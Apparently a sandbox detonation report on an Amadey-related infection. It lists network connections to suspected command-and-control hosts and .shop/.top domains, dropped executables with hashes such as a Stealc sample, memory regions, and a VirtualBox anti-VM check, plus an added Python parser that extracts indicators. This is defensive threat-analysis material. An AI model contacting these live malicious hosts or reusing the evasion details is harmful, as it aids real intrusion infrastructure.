| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thirtv13pt.top | udp |
| RU | 195.133.13.230:80 | thirtv13pt.top | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.13.133.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | femininedspzmhu.shop | udp |
| US | 104.21.66.172:443 | femininedspzmhu.shop | tcp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 104.21.10.172:443 | condedqpwqm.shop | tcp |
| US | 8.8.8.8:53 | 172.66.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| NL | 45.200.149.147:27667 | | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
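The table above mixes three kinds of rows: DNS queries to 8.8.8.8, reverse (in-addr.arpa) lookups of peers the sandbox had already talked to, and the direct TCP connections themselves. Rows with an empty Domain cell can also arrive with the protocol shifted one column to the left. As an added example, not part of the report, the Python below parses rows in this format (a subset copied from the table is embedded), normalises the shifted rows, drops the PTR noise, pairs each resolved domain with the address it was actually contacted on, and flags ports outside 53/80/443. Treating pastebin.com and cdn.discordapp.com as abused legitimate hosting follows the report's own signature; the expected-port set and the output field names are this example's assumptions.

```python
"""Pull indicators out of a sandbox network table in the format shown above.

Added example, not part of the report. Rows are copied from the table; the
'legit hosting' list echoes the report's own signature, the rest is ours.
"""
from collections import namedtuple

Row = namedtuple("Row", "country dest domain proto")

# Subset of rows copied from the report (header kept on purpose; two rows
# are in the shifted '| CC | ip:port | tcp | |' form).
SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 95.179.250.45:26212 | tcp | |
| FI | 65.21.18.51:45580 | tcp | |
| US | 8.8.8.8:53 | fivev5sb.top | udp |
| RU | 195.133.48.136:80 | fivev5sb.top | tcp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 104.21.84.66:443 | millyscroqwp.shop | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.21.18.51:45580 | tcp | |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
""".splitlines()

RESOLVER = "8.8.8.8:53"
EXPECTED_PORTS = {"53", "80", "443"}                    # assumption: anything else gets flagged
LEGIT_HOSTING = {"pastebin.com", "cdn.discordapp.com"}  # from the report's signature list


def parse_row(line):
    """Parse one '| CC | ip:port | domain | proto |' row; None for header/junk.

    Some exports omit the empty Domain cell, yielding '| DE | ip:port | tcp | |'.
    That shifted form is normalised here rather than rejected.
    """
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4:
        return None
    country, dest, domain, proto = cells
    if domain in ("tcp", "udp") and proto == "":
        domain, proto = "", domain
    if proto not in ("tcp", "udp") or ":" not in dest:
        return None
    return Row(country, dest, domain, proto)


def extract_iocs(lines):
    """Separate DNS lookups, PTR noise and direct connections; de-duplicate."""
    domains, ptr, direct, odd_ports, resolved = set(), set(), set(), set(), {}
    for row in filter(None, map(parse_row, lines)):
        if row.dest == RESOLVER and row.proto == "udp":
            if row.domain.endswith(".in-addr.arpa"):
                ptr.add(row.domain)          # reverse lookup of a peer: not an indicator itself
            else:
                domains.add(row.domain.lower())
            continue
        direct.add(row.dest)
        ip, port = row.dest.rsplit(":", 1)
        if port not in EXPECTED_PORTS:
            odd_ports.add(row.dest)
        if row.domain and row.domain != ip:
            resolved[row.domain.lower()] = ip  # domain paired with the address actually contacted
    return {
        "domains": sorted(domains),
        "direct": sorted(direct),
        "nonstandard_ports": sorted(odd_ports),
        "resolved": resolved,
        "legit_hosting_abused": sorted(domains & LEGIT_HOSTING),
        "ptr_lookups_dropped": len(ptr),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_ROWS), indent=2))
```

The resolved mapping is the part to keep when turning this into blocklist material: the Cloudflare-fronted .shop domains share addresses with legitimate tenants, so the domain is the indicator, while the bare-IP rows on 185.215.113.0/24 and the high-port Hetzner connections are indicators in themselves.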
Files
memory/2820-0-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/2820-1-0x0000000077744000-0x0000000077746000-memory.dmp
memory/2820-2-0x0000000000021000-0x000000000004F000-memory.dmp
memory/2820-3-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/2820-4-0x0000000000020000-0x00000000004C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
| MD5 | 59953a2ace8d80a3eac87bb37cf35871 |
| SHA1 | f22821242ad268998f04a52f46ce23bf1d0bddd3 |
| SHA256 | 4fe8a0e454dd7503f35f56e022cfef089a4477e906414663da459c27480c5456 |
| SHA512 | 87e266458db8c1c39d4f4473b7933c30f60964f2246727c48f44b4bcfa83e3207bc660f887148316c0a09681b9795276fe25acea94b5324e1760d5a1472969f8 |
memory/2820-17-0x0000000000020000-0x00000000004C6000-memory.dmp
memory/452-18-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-19-0x0000000000791000-0x00000000007BF000-memory.dmp
memory/452-20-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-21-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-22-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
| MD5 | 2d647cf43622ed10b6d733bb5f048fc3 |
| SHA1 | 6b9c5f77a9ef064a23e5018178f982570cbc64c6 |
| SHA256 | 41426dd54fcabbf30a68b2aa11aa4f61f3862bea83109d3e3c50cfebed1359e6 |
| SHA512 | 62400f1e9646268f0326aab5b95efacb0303f4c5879cccf0cbb24d1f66d0db40d0fdfebb09ba785b5dfd54df2d32e8aab48c1f5f333956b606112de68635ac3a |
memory/4460-43-0x000000007335E000-0x000000007335F000-memory.dmp
memory/4460-44-0x0000000000140000-0x0000000000194000-memory.dmp
memory/2428-46-0x0000000000400000-0x0000000000452000-memory.dmp
memory/2428-48-0x0000000005070000-0x0000000005614000-memory.dmp
memory/2428-49-0x0000000004AC0000-0x0000000004B52000-memory.dmp
memory/2428-50-0x0000000004C50000-0x0000000004C5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp8B96.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
memory/2428-67-0x0000000005720000-0x0000000005796000-memory.dmp
memory/2428-68-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/2428-71-0x0000000006840000-0x0000000006E58000-memory.dmp
memory/2428-72-0x0000000006330000-0x000000000643A000-memory.dmp
memory/2428-73-0x0000000006270000-0x0000000006282000-memory.dmp
memory/2428-74-0x00000000062D0000-0x000000000630C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
| MD5 | 8e74497aff3b9d2ddb7e7f819dfc69ba |
| SHA1 | 1d18154c206083ead2d30995ce2847cbeb6cdbc1 |
| SHA256 | d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66 |
| SHA512 | 9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97 |
memory/2428-90-0x0000000006440000-0x000000000648C000-memory.dmp
memory/3944-94-0x00000000009B0000-0x0000000000AC2000-memory.dmp
memory/2100-96-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-100-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-99-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2100-97-0x0000000000400000-0x000000000050D000-memory.dmp
C:\Users\Admin\AppData\Roaming\07DD4GXsP3.exe
| MD5 | 88367533c12315805c059e688e7cdfe9 |
| SHA1 | 64a107adcbac381c10bd9c5271c2087b7aa369ec |
| SHA256 | c6fc5c06ad442526a787989bae6ce0d32a2b15a12a41f78baca336b6560997a9 |
| SHA512 | 7a8c3d767d19395ce9ffef964b0347a148e517982afcf2fc5e45b4c524fd44ec20857f6be722f57ff57722b952ef7b88f6249339551949b9e89cf60260f0a714 |
C:\Users\Admin\AppData\Roaming\egKXRnvmfw.exe
| MD5 | 30f46f4476cdc27691c7fdad1c255037 |
| SHA1 | b53415af5d01f8500881c06867a49a5825172e36 |
| SHA256 | 3a8f5f6951dad3ba415b23b35422d3c93f865146da3ccf7849b75806e0b67ce0 |
| SHA512 | 271aadb524e94ed1019656868a133c9e490cc6f8e4608c8a41c29eff7c12de972895a01f171e8f625d07994ff3b723bb308d362266f96cb20dff82689454c78f |
memory/2100-121-0x0000000000400000-0x000000000050D000-memory.dmp
memory/2808-124-0x0000000000C90000-0x0000000000CE2000-memory.dmp
memory/4016-126-0x0000000000B70000-0x0000000000BFE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\76b53b3ec448f7ccdda2063b15d2bfc3_c186ecc3-67e4-4d2b-8682-b6c322da87aa
| MD5 | c8c18bedbb9223d97674afd056fbad36 |
| SHA1 | fd231cd340d23c0d6d6dde8d0af43b937d1f618e |
| SHA256 | dd37b70933da899f3b5436440a8ee9d9756813d8d8ef1ce0b558bfd1c25c766d |
| SHA512 | 3550c4a994cb3662b5b28a0b709766d9be536dd8528f5327f8ffe0e1d6ee0f8e9ec0b67b37bd08000289d075715493eab43dbb21b7da68842e1127c74541f051 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 8864202c5fd6edef7dff9e7177d2d18b |
| SHA1 | cdd76aaf0a9d2ea8bcdeaf336032add0ec405313 |
| SHA256 | 3fb12096937620ecb84b306caabccdb902c67923299c433ee184cc75d4ea71c5 |
| SHA512 | fabc71dd02544a32d66fd08e75479805b42ebc1c33f7e64935e59aa7b8bf3e0085ff94e6171c5df88a80df49673dd494be6af3148f0972a2df5afcdd4de90de8 |
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 4107e62fd0aab27e26bb5935018cc2e6 |
| SHA1 | e6bd7391484ff88297953f313789485eb4f5ac28 |
| SHA256 | e414e76bf70e2261c8da9ba3736fcd978aee74c0eee8667931d7aed356a5ef1b |
| SHA512 | 56317293399a4fcd94752ec52061f2239a682d3a939b2a94f89cc8ccaf66575bd13e66295ac4326008fd9f35d0a3d77667425cfef21ec5eb7a8cbefd62927fe7 |
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
| MD5 | f5d7b79ee6b6da6b50e536030bcc3b59 |
| SHA1 | 751b555a8eede96d55395290f60adc43b28ba5e2 |
| SHA256 | 2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459 |
| SHA512 | 532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46 |
memory/452-163-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
| MD5 | 7a02aa17200aeac25a375f290a4b4c95 |
| SHA1 | 7cc94ca64268a9a9451fb6b682be42374afc22fd |
| SHA256 | 836799fd760eba25e15a55c75c50b977945c557065a708317e00f2c8f965339e |
| SHA512 | f6ebfe7e087aa354722cea3fddd99b1883a862fb92bb5a5a86782ea846a1bff022ab7db4397930bcabaa05cb3d817de3a89331d41a565bc1da737f2c5e3720b6 |
memory/452-189-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/452-191-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/1484-190-0x00000000002A0000-0x00000000004E3000-memory.dmp
memory/452-195-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/4016-196-0x0000000008DA0000-0x0000000008E06000-memory.dmp
memory/4016-197-0x000000000A1E0000-0x000000000A3A2000-memory.dmp
memory/4016-198-0x000000000A8E0000-0x000000000AE0C000-memory.dmp
memory/2428-201-0x00000000067B0000-0x0000000006800000-memory.dmp
memory/452-202-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe
| MD5 | 45b55d1e5d2bf60cc572f541ae6fa7d1 |
| SHA1 | 2329f56147a299bcdbf20520e626cc8253e49a8d |
| SHA256 | 039f5c692ba1c67c6e9b475738f40f4311e5e5625e4390d5e51685f6b4e548b8 |
| SHA512 | 5483964e050b2be073d3cf966b6dd6271556d4adfb420fb9ecf81f42f27cd06727016292dceb9a282f9fdcb451507309d1a78f58dd5d84e3022c0ea20c58dbe2 |
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
| MD5 | 7e6a519688246fe1180f35fe0d25d370 |
| SHA1 | 8e8719ac897dfef7305311dc216f570af40709af |
| SHA256 | 32a927e9b33371b82bae9f02b5ebf07c19ae5a3a7e3c0cd3fcbee7cfff7f257a |
| SHA512 | a751e911eb254749a3c8c98740f455a5be32ce1af94dc90eba8fc677d6d7379303f80247748dfcfe9c8570edb3488a5af97fa7ff29c815bec6824dd491e27972 |
memory/1444-240-0x0000000000400000-0x0000000000643000-memory.dmp
memory/1444-243-0x0000000000400000-0x0000000000643000-memory.dmp
memory/3340-245-0x0000000000400000-0x000000000079D000-memory.dmp
memory/1444-244-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
| MD5 | b826dd92d78ea2526e465a34324ebeea |
| SHA1 | bf8a0093acfd2eb93c102e1a5745fb080575372e |
| SHA256 | 7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b |
| SHA512 | 1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17 |
memory/1484-246-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/452-269-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/2288-280-0x0000000000400000-0x0000000001069000-memory.dmp
C:\Users\Admin\1000238002\Amadeus.exe
| MD5 | 36a627b26fae167e6009b4950ff15805 |
| SHA1 | f3cb255ab3a524ee05c8bab7b4c01c202906b801 |
| SHA256 | a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a |
| SHA512 | 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094 |
C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
| MD5 | b73cf29c0ea647c353e4771f0697c41f |
| SHA1 | 3e5339b80dcfbdc80d946fc630c657654ef58de7 |
| SHA256 | edd76f144bbdbfc060f7cb7e19863f89eb55863efc1a913561d812083b6306cd |
| SHA512 | 2274d4c1e0ef72dc7e73b977e315ddd5472ec35a52e3449b1f6b87336ee18ff8966fed0451d19d24293fde101e0c231a3caa08b7bd0047a18a41466c2525e2e8 |
memory/2156-322-0x00000000004D0000-0x00000000004E2000-memory.dmp
memory/1444-323-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
| MD5 | 03cf06e01384018ac325de8bc160b4b2 |
| SHA1 | 1853505e502b392fd556a9ce6050207230cc70cd |
| SHA256 | 5ab3785b2b72eaf7edff8961eb8ff8dd3dc6cc7031bc96ceb06a899b6fb3bbbc |
| SHA512 | be1f2cf898db93e96e8817bf2d0ab0ef0f49d5bba4efba2de4046f6b381e8eda6ff5fcfdc057b6cbc4de5b3a7b096612c1e0d6b0d395ee685b3844ba5dc0e1b6 |
memory/3684-346-0x0000000000030000-0x00000000000C0000-memory.dmp
memory/452-347-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
| MD5 | 30daa686c1f31cc4833bd3d7283d8cdc |
| SHA1 | 70f74571fafe1b359cfe9ce739c3752e35d16cf5 |
| SHA256 | 504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822 |
| SHA512 | 9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9 |
memory/4008-369-0x0000000000580000-0x00000000005D2000-memory.dmp
memory/4008-390-0x00000000067C0000-0x000000000680C000-memory.dmp
memory/2288-391-0x0000000000400000-0x0000000001069000-memory.dmp
memory/3936-394-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/3936-396-0x0000000000790000-0x0000000000C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000260001\5KNCHALAH.exe
| MD5 | 3f99c2698fc247d19dd7f42223025252 |
| SHA1 | 043644883191079350b2f2ffbefef5431d768f99 |
| SHA256 | ba8561bf19251875a15471812042adac49f825c69c3087054889f6107297c6f3 |
| SHA512 | 6a88d1049059bba8f0c9498762502e055107d9f82dbc0aacfdd1e1c138bdb875cf68c2b7998408f8235e53b2bb864ba6f43c249395640b62af305a62b9bfcd67 |
memory/2196-418-0x0000012758D90000-0x0000012758F2A000-memory.dmp
memory/2196-422-0x00000127736B0000-0x00000127737DA000-memory.dmp
memory/2196-432-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-456-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-454-0x00000127736B0000-0x00000127737D4000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/2196-452-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-450-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-448-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-446-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2156-1519-0x000000001BDB0000-0x000000001BE20000-memory.dmp
memory/2196-1521-0x0000012773880000-0x00000127738CC000-memory.dmp
memory/2196-1520-0x00000127737E0000-0x0000012773884000-memory.dmp
memory/2156-1518-0x000000001B220000-0x000000001B2A4000-memory.dmp
memory/2196-444-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-442-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-440-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-438-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-436-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-434-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-430-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-428-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-426-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-424-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/2196-423-0x00000127736B0000-0x00000127737D4000-memory.dmp
memory/1484-1537-0x00000000002A0000-0x00000000004E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
| MD5 | 771b8e84ba4f0215298d9dadfe5a10bf |
| SHA1 | 0f5e4c440cd2e7b7d97723424ba9c56339036151 |
| SHA256 | 3f074fb6a883663f2937fd9435fc90f8d31ceabe496627d40b3813dbcc472ed0 |
| SHA512 | 2814ef23653c9be5f5e7245af291cf330c355ed12b4db76f71b4de699c67a9ffd1bdc0cc1df5352335b57ab920404b9c8e81cd9257527264bde4f72a53700164 |
memory/3096-1558-0x0000000000580000-0x00000000005A0000-memory.dmp
memory/3096-1559-0x0000000000E10000-0x0000000000E16000-memory.dmp
memory/1444-1574-0x0000000000400000-0x0000000000643000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\392887640118
| MD5 | ff40ec9dbc96e3a8a517dcfdc08d6ea3 |
| SHA1 | 628f3c0beefcf1c0fcbc8af9fa4f43c596cfc73b |
| SHA256 | fada68d6cd7155e33a70274f8f7b549fd6e7bff47a67b8d7832bbc4efc255da1 |
| SHA512 | 1f8855f5923cbcc40749271eb854771627b2782e387d292f09c1d4d28566cf8f237284ac058c0102475e31c912aa88893593d61cdd085edde41174b21ac41a92 |
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
| MD5 | fd2defc436fc7960d6501a01c91d893e |
| SHA1 | 5faa092857c3c892eab49e7c0e5ac12d50bce506 |
| SHA256 | ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945 |
| SHA512 | 9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log
| MD5 | 84cfdb4b995b1dbf543b26b86c863adc |
| SHA1 | d2f47764908bf30036cf8248b9ff5541e2711fa2 |
| SHA256 | d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b |
| SHA512 | 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce |
C:\Users\Admin\AppData\Local\Temp\1000226001\fikbbm0902845.exe
| MD5 | c965aa525ae4cfbc3b45c6b7e9271a59 |
| SHA1 | 3a84d4c1c9277173b530263107af4caf1f61213f |
| SHA256 | 50ea6c698e72e13b8132b66bbca9479b7f4815ebb2f8adb3ca1cfec79523107e |
| SHA512 | bfddf9f5cb766b20f564b6a94048d1779431794b02cbd0993f4f3554b46b1a4e17bd3def58200da665fd991d1480b22992181ef543413d8013a19889484c3f1c |
C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
| MD5 | db2a12edc73769f2f2b6b01545afe2c3 |
| SHA1 | 73dc44fb0753296f51b851299f468031ceb77b54 |
| SHA256 | e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42 |
| SHA512 | dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4 |
C:\Users\Admin\AppData\Local\Temp\Luck
| MD5 | 2dc7d0c0f159951f61bf3a13b09248fa |
| SHA1 | 096befa4fb246d61bce5143c841a4557ef2db783 |
| SHA256 | be3789def126bae2c4aab1f575cd5a0672ad622f6ebbafa1531a8b88b144beec |
| SHA512 | bea4558dc80e80d1c7933472d2661a9a1759ea0f5ef86a6ebf48a5a828472cb6a22b2fbbe760c97a204530e03c9bd6700c64e0f66c6d12c52acaad0d95e9f38a |
C:\Users\Admin\AppData\Local\Temp\filename.exe
| MD5 | 0885bc5d9c2aa1895ebd5fcad13b53be |
| SHA1 | ad559563e4e21cb7354a4692b31852839b0b22d7 |
| SHA256 | b7763f18a43e9727036d685576fe102901f45fd1b9407395bbc10966a9811d25 |
| SHA512 | 91c73e9a3a74624dad400c0c5b7670b977946a06344782ca859be70578e64c2f0d4fdb3eadb70821168c64929a8bfe16a18fb10ba65bcd80e14701ef8c05091f |
C:\Users\Admin\AppData\Local\Temp\590819\Associates.pif
| MD5 | 18ce19b57f43ce0a5af149c96aecc685 |
| SHA1 | 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36 |
| SHA256 | d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd |
| SHA512 | a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558 |
C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
| MD5 | 20134f10fe5275891ee287c9b7f9bf62 |
| SHA1 | 5f42316b48261176b65cb51e5d59c20e38cab03f |
| SHA256 | bebe99bb379eca567b4ab4389a56580cd271fb6e184cd84149c4b304976b21da |
| SHA512 | 7cf9fdc588f94ebd89797982bd4c0d10b5853d05aedfcea037f4c4839a6c0a2f95292f2526675c8408367f7a58cf22d82a9746941ab71a296f44f32672ac9a42 |
memory/5688-1814-0x0000000000AB0000-0x000000000115B000-memory.dmp
memory/2276-1815-0x0000000002CC0000-0x0000000002CF6000-memory.dmp
memory/2276-1816-0x00000000057B0000-0x0000000005DD8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3m30rkm4.nsf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2276-1823-0x0000000005F30000-0x0000000005F96000-memory.dmp
memory/2276-1822-0x0000000005E90000-0x0000000005EB2000-memory.dmp
memory/2276-1828-0x0000000006110000-0x0000000006464000-memory.dmp
memory/2276-1831-0x0000000006600000-0x000000000661E000-memory.dmp
memory/2276-1833-0x0000000006BE0000-0x0000000006C76000-memory.dmp
memory/2276-1834-0x0000000006AD0000-0x0000000006AEA000-memory.dmp
memory/2276-1836-0x0000000006B50000-0x0000000006B72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
| MD5 | 0ec1f7cc17b6402cd2df150e0e5e92ca |
| SHA1 | 8405b9bf28accb6f1907fbe28d2536da4fba9fc9 |
| SHA256 | 4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4 |
| SHA512 | 7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861 |
memory/6024-1858-0x0000000006090000-0x00000000063E4000-memory.dmp
memory/6024-1868-0x0000000006D30000-0x0000000006D7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000296001\Channel3.exe
| MD5 | 251026403399837fa07b9ca1481a2c77 |
| SHA1 | ada941cebcc0bb40105718cc6857f3bd597a067d |
| SHA256 | 8647df6e68b1c951961443dcce0cc03211d2ede60409ab0b448ac6df6f9cfed9 |
| SHA512 | 6a509b2d07091f4433fae8fede1623a39633c430a0361dfdd7147f3e3853c06695fcc5a58f365a959586c132d08954d06d00c353a31edf24bfbb8a98bdc8e6b5 |
memory/5688-1905-0x0000000000AB0000-0x000000000115B000-memory.dmp
memory/1500-1914-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/1500-1916-0x0000000000790000-0x0000000000C36000-memory.dmp
memory/5508-1932-0x0000000000B80000-0x0000000000C0C000-memory.dmp
memory/5508-1934-0x0000000008460000-0x00000000084AC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-07 14:44
Reported
2024-09-07 14:46
Platform
win11-20240802-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
